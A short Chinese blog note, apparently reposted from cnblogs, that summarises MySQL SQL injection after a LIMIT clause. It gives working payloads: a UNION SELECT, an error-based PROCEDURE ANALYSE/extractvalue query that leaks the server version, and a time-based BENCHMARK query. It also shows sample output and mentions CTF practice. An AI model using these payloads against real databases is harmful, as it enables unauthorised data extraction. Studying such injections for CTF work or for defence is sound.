码迷,mamicode.com
首页 > 其他好文 > 详细

小结--limit注入

时间:2018-05-25 00:14:45      阅读:197      评论:0      收藏:0      [点我收藏+]

标签:erro   href   path   cat   比较   -o   extract   sele   pre   

0x01总结一下

这种类型一般实际情况中在参数为start返回一些结果变量的时候,或者其他一些情况,在ctf中也比较多

没有order by

可以跟union select 进行查询

mysql> select user from users limit 0,1 union select user from users;
+-------+
| user  |
+-------+
| admin |
| test  |
| sp4rk |
| qwer  |
+-------+

有 order by

这里具体原理可以参考文章 Mysql注入点在limit关键字后面的利用方法

mysql> select user from users order by user_id limit 0,4 procedure analyse(extractvalue(1,concat(0x5e24,version(),0x5e24)),1);
ERROR 1105 (HY000): XPATH syntax error: '^$5.5.53^$'
基于时间  
select user from users order by user_id limit 0,4 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5,BENCHMARK(5,SHA1(1)),1))))),1);
不知道为什么我这里并没有延时....

小结--limit注入

标签:erro   href   path   cat   比较   -o   extract   sele   pre   

原文地址:https://www.cnblogs.com/spark-xl/p/9085643.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!